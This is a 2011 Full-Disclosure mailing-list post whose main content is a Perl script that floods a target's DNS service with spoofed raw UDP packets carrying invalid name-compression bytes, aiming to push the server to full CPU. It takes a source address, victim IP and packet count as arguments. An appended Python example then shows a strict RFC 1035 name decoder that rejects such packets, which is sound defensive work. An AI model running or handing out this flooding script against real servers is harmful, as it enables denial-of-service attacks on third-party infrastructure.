
[Full-disclosure] Semi 0day DNS Invalid Compression attack

From: David <codeinjection_at_nospam>
Date: Sun Jul 10 2011 - 14:49:49 GMT
To: full-disclosure@lists.grok.org.uk

#!/usr/bin/perl
#
# DNS Invalid Compression attack coded by sipher (www.elitter.net)
#
# History:
# elitter.net provides Free UNIX shells and receives its more than fair
# amount of DDoS's and DoS attacks. 1 lovely day someone targeted our DNS
# services and managed to bring the system to 100% CPU usage.
#
# Goal:
#
# Reproduce following error message, hopefully get the same results of 100%
# CPU usage.
#
# Error output:
#
# Jul 9 19:36:30 42262 mydns[26545]: 09-Jul-2011 19:36:30+359454 #24949 12337 UDP 202.164.36.27 000 000 FORMERR Invalid_compression_method 13365 0 0 0 LOG N 006 ""
#
# Here is a sample of the packet (tcpdump -lnx port 53):
#
# 4500 002b 512f 4000 3411 92a9 2989 601e
# cc2d 0d15 e483 0035 0017 e98c 3031 3233
# 3435 3637 3839 4142 4344 4500 0000
#
# So next time you decide to attack someone. You might just squash your bug.
#
# Testbed:
# isc.org,dbjdns
#
# DNS packets use an ad-hoc compression method in which portions of domain
# names can sometimes be replaced with two-byte pointers to previous domain
# names.
# The precise rule is that a name can be compressed if it is a response
# owner name, the name in NS data, the name in CNAME data, the name in PTR
# data, the name in MX data, or one of the names in SOA data.
# One problem with DNS compression is the amount of code required to parse
# it. Reliably locating all these names takes quite a bit of work that
# would otherwise have been unnecessary for a DNS cache. LZ77 compression
# would have been much easier to implement.
#
# Another problem with DNS compression is the amount of code required to
# correctly generate it. (RFC 1035 allowed servers to not bother compressing
# their responses; however, caches have to implement compression, so that
# address lists from some well-known sites don't burst the seams of a DNS UDP
# packet.)
# Not only does the compressor need to figure out which names can be
# compressed, but it also needs to keep track of compression targets earlier
# in the packet.
# RFC 1035 doesn't make clear exactly what targets are allowed.
# (Most versions of BIND do not use pointers except to compressible names;
# suffixes of the query name are excluded. dnscache uses pointers to suffixes
# of the query name.)
#
# -djb
#
# Shouts: burnout, hightech, spithash, pookie, #elitter@irc.elitter.net
#

# http://www.hsc.fr/ressources/outils/rawsock/index.html.en
use Net::RawSock;

if($#ARGV != 2) {
        print "--> DNS Invalid compression attack (www.elitter.net)\n";
        print "--> NOTE: Most ISP block spoofed UDP packets. Enter a valid source address.\n";
        print "./compdns.pl < source address > < IP of victim > < # of packets >\n";
        exit(0);
}

print "--> DNS Invalid compress attack\n";
$count = 1;
$sourceaddy = $ARGV[0];
$target = $ARGV[1];
$numpkt = $ARGV[2];

$dst_host = (gethostbyname($sourceaddy))[4];
$src_host = (gethostbyname($target))[4];

$dst_host = pack('a4', $dst_host);
$src_host = pack('a4', $src_host);

        while ($count <= $numpkt) {

                print "--> [$count]: ($sourceaddy)->($target)\n";

                my $pkt = "\x45\x00\x00\x2b\x00\x00\x40\x00\x34\x11\x92\xa9".
                          # IP header source address field ($dst_host is built from ARGV[0])
                          # Example: "\x43\x9f\x27\x94".
                          "$dst_host".
                          # IP header destination address field ($src_host is built from ARGV[1])
                          # Example: "\xcc\x2d\x0d\x12".
                          "$src_host".
                          # source port
                          "\xe4\x83".
                          # destination port
                          "\x00\x35".
                          # length
                          "\x00\x17".
                          # checksum null whore
                          "\x00\x00".
                          # data = junk
                          "\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00".
                          "\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00".
                          "\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00";

                Net::RawSock::write_ip($pkt);
                $count++;
        }

print "--> Done.\n";

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
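Added example, not part of the post above and not code from mydns, BIND or dnscache: a strict DNS name decoder in Python that classifies every length byte by its top two bits as RFC 1035 section 4.1.4 defines them (00 = label, 11 = pointer, 01/10 = reserved) and refuses the reserved forms before doing any work. SAMPLE_PAYLOAD is the UDP payload from the tcpdump sample in the post (the bytes after the IP and UDP headers); note that its first two words, 0x3031 and 0x3435, are exactly the 12337 message ID and 13365 QDCOUNT printed in the mydns log line. check_packet() refuses that packet up front because 13365 questions cannot fit in 18 bytes, and read_name() applied at offset 12 stops on the length byte 0x43, the same "invalid compression method" the log reports. The pointer-hop cap of 16, the minimum-size arithmetic behind the count check, and the two extra packets (a well-formed compressed response using a 0xC00C pointer, and a question whose name points at itself) are constructed for this example.

```python
"""Strict decoding of DNS names (RFC 1035 section 4.1.4): reject malformed
length bytes, non-backward pointers and impossible section counts early."""
import struct

# Constructed from the tcpdump hex in the post: the bytes that follow the
# 20-byte IP header and 8-byte UDP header ("3031 3233 ... 4500 0000").
SAMPLE_PAYLOAD = bytes.fromhex("3031 3233 3435 3637 3839 4142 4344 4500 0000")

# Constructed well-formed response: question example.com/A and one answer
# whose owner name is the pointer 0xC00C back to offset 12 (RDATA 192.0.2.1).
VALID_RESPONSE = (
    bytes.fromhex("1234 8180 0001 0001 0000 0000")
    + b"\x07example\x03com\x00" + bytes.fromhex("0001 0001")
    + bytes.fromhex("c00c 0001 0001 00000e10 0004 c0000201")
)

# Constructed: one question whose name is a pointer to its own offset (12).
SELF_POINTER = bytes.fromhex("0001 0100 0001 0000 0000 0000 c00c 0001 0001")

MAX_NAME_LEN = 255       # RFC 1035 limit on a decoded name
MAX_POINTER_HOPS = 16    # assumption: the RFC gives no number, so a small fixed cap


class DnsFormatError(ValueError):
    """Raised where a server would answer FORMERR and stop parsing."""


def read_name(msg, offset):
    """Decode the (possibly compressed) name at `offset`.

    Returns (name, offset_after_the_name_in_the_original_stream).  Pointers
    must point strictly backwards, so a chain can never loop, and the number
    of hops is capped anyway.  Reserved label types (top bits 01 or 10) are
    the "Invalid_compression_method" case from the mydns log line.
    """
    labels, total_len, hops, pos, end = [], 0, 0, offset, None
    while True:
        if pos >= len(msg):
            raise DnsFormatError("name runs past end of message at offset %d" % pos)
        b = msg[pos]
        kind = b & 0xC0
        if kind == 0x00:                       # literal label; b <= 63 by construction
            if b == 0:                         # root label terminates the name
                return ".".join(labels) or ".", (pos + 1 if end is None else end)
            if pos + 1 + b > len(msg):
                raise DnsFormatError("label of %d bytes runs past end of message" % b)
            total_len += b + 1
            if total_len > MAX_NAME_LEN:
                raise DnsFormatError("name longer than %d octets" % MAX_NAME_LEN)
            labels.append(msg[pos + 1:pos + 1 + b].decode("ascii", "backslashreplace"))
            pos += 1 + b
        elif kind == 0xC0:                     # compression pointer
            if pos + 1 >= len(msg):
                raise DnsFormatError("truncated compression pointer at offset %d" % pos)
            target = ((b & 0x3F) << 8) | msg[pos + 1]
            if end is None:
                end = pos + 2                  # caller resumes after the first pointer
            if target >= pos:
                raise DnsFormatError("pointer at offset %d does not point backwards (%d)" % (pos, target))
            hops += 1
            if hops > MAX_POINTER_HOPS:
                raise DnsFormatError("more than %d compression pointers in one name" % MAX_POINTER_HOPS)
            pos = target
        else:                                  # 0x40 / 0x80: reserved label types
            raise DnsFormatError("reserved label type 0x%02x at offset %d (invalid compression method)" % (kind, pos))


def name_check(msg, offset):
    """None if the name at `offset` decodes cleanly, else the FORMERR reason."""
    try:
        read_name(msg, offset)
        return None
    except DnsFormatError as e:
        return str(e)


def parse_message(msg):
    """Parse header, question section and every resource record, strictly."""
    if len(msg) < 12:
        raise DnsFormatError("header shorter than 12 bytes")
    ident, flags, qd, an, ns, ar = struct.unpack("!6H", msg[:12])
    # Smallest possible question is 5 bytes, smallest record 11 bytes, so
    # inflated counts (the sample carries QDCOUNT 13365) are refused up front.
    if qd * 5 + (an + ns + ar) * 11 > len(msg) - 12:
        raise DnsFormatError("section counts %d/%d/%d/%d cannot fit in %d bytes" % (qd, an, ns, ar, len(msg)))
    pos, questions, records = 12, [], []
    for _ in range(qd):
        name, pos = read_name(msg, pos)
        if pos + 4 > len(msg):
            raise DnsFormatError("question truncated")
        qtype, qclass = struct.unpack("!HH", msg[pos:pos + 4])
        pos += 4
        questions.append((name, qtype, qclass))
    for _ in range(an + ns + ar):
        name, pos = read_name(msg, pos)
        if pos + 10 > len(msg):
            raise DnsFormatError("resource record truncated")
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[pos:pos + 10])
        pos += 10
        if pos + rdlen > len(msg):
            raise DnsFormatError("RDATA runs past end of message")
        records.append((name, rtype, rclass, ttl, msg[pos:pos + rdlen]))
        pos += rdlen
    return {"id": ident, "flags": flags, "questions": questions, "records": records}


def check_packet(msg):
    """("NOERROR", parsed dict) or ("FORMERR", reason) for one UDP payload."""
    try:
        return "NOERROR", parse_message(msg)
    except DnsFormatError as e:
        return "FORMERR", str(e)


if __name__ == "__main__":
    for label, pkt in (("sample", SAMPLE_PAYLOAD), ("valid", VALID_RESPONSE), ("loop", SELF_POINTER)):
        print(label, check_packet(pkt)[0], name_check(pkt, 12))
```

The point of the backwards-only rule is that every pointer hop moves to a strictly lower offset, so the decoder cannot be made to spin on a cycle even without the hop cap; the count check is what keeps a 15-byte datagram from being treated as 13365 questions plus tens of thousands of records by a parser that trusts the header.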